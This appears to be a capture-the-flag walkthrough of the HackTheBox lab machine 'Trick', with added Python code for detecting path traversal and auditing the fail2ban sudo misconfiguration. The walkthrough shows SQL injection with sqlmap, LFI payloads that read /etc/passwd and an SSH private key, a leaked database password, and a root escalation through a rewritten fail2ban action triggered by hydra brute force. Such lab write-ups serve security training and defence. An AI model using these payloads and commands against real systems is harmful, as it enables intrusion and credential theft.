Scanning
TARGET=10.10.11.166 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//') -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
25/tcp open smtp syn-ack ttl 63 Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain syn-ack ttl 63 ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http syn-ack ttl 63 nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-title: Coming Soon - Start Bootstrap Theme
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Add the host to /etc/hosts:
10.10.11.166 debian.localdomain
Web Enum
> dirsearch -u http://debian.localdomain/ -x 404,401
[17:02:51] 301 - 185B - /js -> http://debian.localdomain/js/
[17:03:40] 403 - 571B - /assets/
[17:03:40] 301 - 185B - /assets -> http://debian.localdomain/assets/
[17:03:54] 301 - 185B - /css -> http://debian.localdomain/css/
[17:04:13] 200 - 5KB - /index.html
[17:04:17] 403 - 571B - /js/
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://debian.localdomain/" -H "Host: FUZZ.debian.localdomain"
No virtual hosts found under debian.localdomain.
SMTP Enum
PORT STATE SERVICE
25/tcp open smtp
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed
| smtp-enum-users:
|_ root
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
DNS Enum
> dig axfr @10.10.11.166 trick.htb
; <<>> DiG 9.18.1-1-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 128 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Tue Jul 05 18:52:17 EDT 2022
;; XFR size: 6 records (messages 1, bytes 231)
SQLi: rabbit hole
- The login form at http://preprod-payroll.trick.htb/ajax.php?action=login is vulnerable to SQLi:
> sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --data "username=admin&password=pass" -p password
> sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --data "username=admin&password=pass" -p password --dbms mysql --dbs
available databases [2]:
[*] information_schema
[*] payroll_db
> sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --data "username=admin&password=pass" -p password --dbms mysql -D payroll_db --dump
position
[19:14:51] [INFO] retrieved: employee
[19:15:26] [INFO] retrieved: department
[19:16:08] [INFO] retrieved: payroll_items
[19:17:07] [INFO] retrieved: attendance
[19:17:45] [INFO] retrieved: employee_deductions
[19:19:07] [INFO] retrieved: employee_allowances
[19:19:57] [INFO] retrieved: users
[19:20:18] [INFO] retrieved: deductions
[19:20:59] [INFO] retrieved: payroll
[19:21:31] [INFO] retrieved: allowances
[19:22:11] [INFO] fetching columns for table 'users' in database 'payroll_db'
[19:22:11] [INFO] retrieved: 8
[19:22:16] [INFO] retrieved: id
[19:22:24] [INFO] retrieved: doctor_id
[19:23:06] [INFO] retrieved: name
[19:23:22] [INFO] retrieved: address
[19:23:48] [INFO] retrieved: contact
[19:24:17] [INFO] retrieved: username
[19:24:48] [INFO] retrieved: password
[19:25:23] [INFO] retrieved: type
+----+-----------+------+------+---------+---------+----------+----------+
| id | doctor_id | name | type | address | contact | password | username |
+----+-----------+------+------+---------+---------+----------+----------+
| 1 | 0 | asdf | 1 | <blank> | <blank> | asdfa | dfasdf |
+----+-----------+------+------+---------+---------+----------+----------+
- Found login dfasdf:asdfa, but it looks like an account created by another player.
LFI
- PHP source read through the LFI contains the database credentials:
$conn= new mysqli('localhost','remo','TrulyImpossiblePasswordLmao123','payroll_db')or die("Could not connect to mysql".mysqli_error($con));
- The LFI appends a .php extension to the included name, so it cannot read arbitrary files and is not useful beyond this.
- Continue looking for more virtual hosts:
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://trick.htb/" -H "Host: preprod-FUZZ.trick.htb" --hh 5480
000000254: 200 178 L 631 W 9660 Ch "marketing"
- There is another LFI in the page parameter of preprod-marketing; the second, `....//` form is used to get past filtering of `../`:
> http://preprod-marketing.trick.htb/index.php?page=../../../../../../../../../etc/passwd
> http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//etc/passwd
Found user: michael
# Get the user's SSH private key:
> curl http://preprod-marketing.trick.htb/index.php?page=....//....//....//....//....//....//....//....//home/michael/.ssh/id_rsa
> ssh -i id_rsa michael@10.10.11.166
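As an added defender's example (not from this writeup), the Python below models the single-pass `../` filter that the `....//` payload above is assumed to bypass, a canonicalising resolver that refuses anything outside the document root, and a scan over nginx access-log lines for the traversal sequences used above. WEB_ROOT, the log lines and the client address are constructed.

```python
import posixpath
import re
from typing import List, Optional

# Assumed (the writeup does not show the source): the marketing app removes
# "../" from ?page= in a single pass, which is why "....//" still traverses.
WEB_ROOT = "/var/www/market"   # constructed document root, not from the page

def weak_strip(page: str) -> str:
    """Single-pass removal of '../': the kind of filter '....//' defeats."""
    return page.replace("../", "")

def hardened_resolve(page: str, root: str = WEB_ROOT) -> Optional[str]:
    """Canonicalise the requested file and refuse anything outside root.
    On a live server also apply os.path.realpath so symlinks cannot escape."""
    candidate = posixpath.normpath(posixpath.join(root, page))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None

# "....//" contains "../", so the plain pattern already catches that variant.
TRAVERSAL = re.compile(r"\.\./|\.\.\\|%2e%2e(%2f|%5c|/)|\.\.%2f", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def flag_traversal(access_log_lines: List[str]) -> List[str]:
    """Request targets in nginx access-log lines that carry traversal sequences."""
    hits = []
    for line in access_log_lines:
        m = REQUEST.search(line)
        if m and TRAVERSAL.search(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed log lines in nginx 'combined' format; the client address is made up.
SAMPLE_LOG = [
    '10.10.14.5 - - [05/Jul/2022:18:55:01 -0400] "GET /index.php?page=home.html HTTP/1.1" 200 9660 "-" "curl/7.83.1"',
    '10.10.14.5 - - [05/Jul/2022:18:56:12 -0400] "GET /index.php?page=....//....//....//etc/passwd HTTP/1.1" 200 2241 "-" "curl/7.83.1"',
    '10.10.14.5 - - [05/Jul/2022:18:57:40 -0400] "GET /index.php?page=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 2241 "-" "curl/7.83.1"',
]
```

Note that `hardened_resolve` never strips anything: `....//` stays a harmless (non-existent) directory name under the root instead of collapsing into `../`.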
Privilege escalation
> sudo -l
Matching Defaults entries for michael on trick:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User michael may run the following commands on trick:
(root) NOPASSWD: /etc/init.d/fail2ban restart
- The fail2ban action config can be replaced, so swap in a modified action file (paths are relative to /etc/fail2ban):
> cp action.d/iptables-multiport.conf /tmp
> vi /tmp/iptables-multiport.conf
Change the actionban line to:
actionban = chmod +s /bin/bash
> rm -f action.d/iptables-multiport.conf
> cp /tmp/iptables-multiport.conf action.d/
> sudo /etc/init.d/fail2ban restart
- Run hydra against SSH to trigger the ban action, then check that /bin/bash now has the setuid bit:
> hydra -l michael -P /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ssh://10.10.11.166
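Added audit example, not part of the writeup: the root cause here is a NOPASSWD sudo rule that restarts fail2ban, combined with a config directory the same user can write into. The Python below checks a host for that combination; the sudo line is copied from the output above, while the temporary directory tree and the uid/gid it is audited as are constructed.

```python
import os, re, stat, tempfile

# Constructed copy of the sudo -l line from the writeup (the dangerous rule).
SUDO_L_OUTPUT = "(root) NOPASSWD: /etc/init.d/fail2ban restart\n"
SUDO_RULE = re.compile(r"\(root\)\s+NOPASSWD:\s+(\S*fail2ban\S*)")

def fail2ban_restart_rules(sudo_l_output):
    """Commands in 'sudo -l' output that restart fail2ban as root without a password."""
    return SUDO_RULE.findall(sudo_l_output)

def writable_by(path, uid, gids):
    """True if a user with this uid and group set can write the path."""
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in set(gids) and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)

def writable_config_paths(conf_dir, uid, gids):
    """Paths under conf_dir (relative) the user could alter. A writable directory
    alone is enough: the file can be removed and recreated, exactly as above."""
    found = []
    for dirpath, _dirs, files in os.walk(conf_dir):
        for p in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            if writable_by(p, uid, gids):
                found.append(os.path.relpath(p, conf_dir))
    return sorted(found)

def audit(sudo_l_output, conf_dir, uid, gids):
    """Flag the combination that yields root here: sudo restart + writable config."""
    rules = fail2ban_restart_rules(sudo_l_output)
    writable = writable_config_paths(conf_dir, uid, gids) if rules else []
    return {"restart_rules": rules, "writable": writable}

def build_demo_tree():
    """Throwaway stand-in for /etc/fail2ban (constructed, not the real tree)."""
    root = tempfile.mkdtemp(prefix="f2b-demo-")
    action_d = os.path.join(root, "action.d")
    os.mkdir(action_d)
    conf = os.path.join(action_d, "iptables-multiport.conf")
    with open(conf, "w") as fh:
        fh.write("[Definition]\nactionban = <placeholder ban command>\n")
    os.chmod(conf, 0o644)
    os.chmod(action_d, 0o775)  # group-writable action.d: the weak setting
    return root

def demo():
    """Audit the demo tree as a non-owner who is in the directory's group."""
    root = build_demo_tree()
    st = os.stat(root)
    return audit(SUDO_L_OUTPUT, root, st.st_uid + 1, [st.st_gid])
```

On a real host call `audit()` with the user's actual uid and `os.getgrouplist()` output against /etc/fail2ban; any non-empty `writable` list next to a restart rule is the finding.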